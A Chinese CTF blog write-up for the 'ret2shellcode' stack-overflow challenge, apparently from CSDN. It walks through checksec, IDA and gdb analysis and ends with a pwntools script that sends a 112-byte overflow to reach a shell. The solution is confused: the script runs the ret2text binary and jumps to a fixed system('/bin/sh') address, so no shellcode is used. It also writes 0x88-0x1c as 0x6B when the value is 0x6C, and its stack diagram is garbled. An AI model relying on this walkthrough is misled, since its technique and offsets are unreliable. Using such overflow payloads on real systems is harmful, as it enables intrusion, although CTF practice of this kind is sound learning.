-
跟着CTF-wiki学pwn——ret2shellcode
链接: 配置工具,gdb,ida
ret2shellcode题解
checksec查看:
no canary=可以简单栈溢出
NX disabled = 将shellcode放在数据段,即可执行
ida查看:
可以输入100个字节,复制到buf2,不能够溢出
原来buf2在bss段,
bss段:一般指程序中未初始化的或者初始化为0的全局变量和静态变量的一块内存区域,特点是可读写,在程序执行之前,bss段清0
是不是可以执行呢
gdb调试:
gdb ret2shellcode disas main b main r vmmap- 1
- 2
- 3
- 4
- 5
可以看到0804A080这个地址在上面选中的这个区域内,显示rwxp即可读写的权限。
lea eax,[esp+0x1c] mov DWORD PTR [esp], eax # 可以知道字符串起始地址相较于esp为+0x1c- 1
- 2
- 3
所以距离ebp地址为0x88-0x1c = 0x6B
那么覆盖到返回地址就是:
+-----------------+ | /bin/sh | 原ret返回位置 +-----------------+ | holk | 原saved ebp位置(4字节) ebp--->+-----------------+ | | | | | | | | | | | | s起始,ebp-0x6B-->+-----------------+- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
0x6B+4 = 112(十进制)个字节。
知道了溢出字符数了,接下来找system(/bin/sh)
栈溢出题目,有了溢出字符量,有了system(/bin/sh) 即为完成题目
构造payload
from pwn import * sh = process('./ret2text') shell = 0x0804863A payload = 'a'*112 + p32(shell) #112个字节填满栈空间至ret+shell_add sh.sendline(payload) sh.interactive()- 1
- 2
- 3
- 4
- 5
- 6
-
相关阅读:
acwing算法提高之图论--有向图的强连通分量
电脑屏幕花屏怎么办?5个方法解决问题!
web自动化测试详细流程和步骤
单目标追踪——【评测工具】Ubuntu20.04的Python版本的VOT评测工具
【Qt之QMapIterator】检测是否为空
javascript原生态xhr上传多个图片,可预览和修改上传图片为固定尺寸比例,防恶意代码,加后端php处理图片
在MySQL中使用VARCHAR字段进行日期筛选
[Spring] Spring5——IOC 简介(二)
【重识云原生】第四章云网络4.7.4节vhost-user方案——virtio的DPDK卸载方案
XSS攻击笔记(上)
- 原文地址:https://blog.csdn.net/qq_42882717/article/details/125551868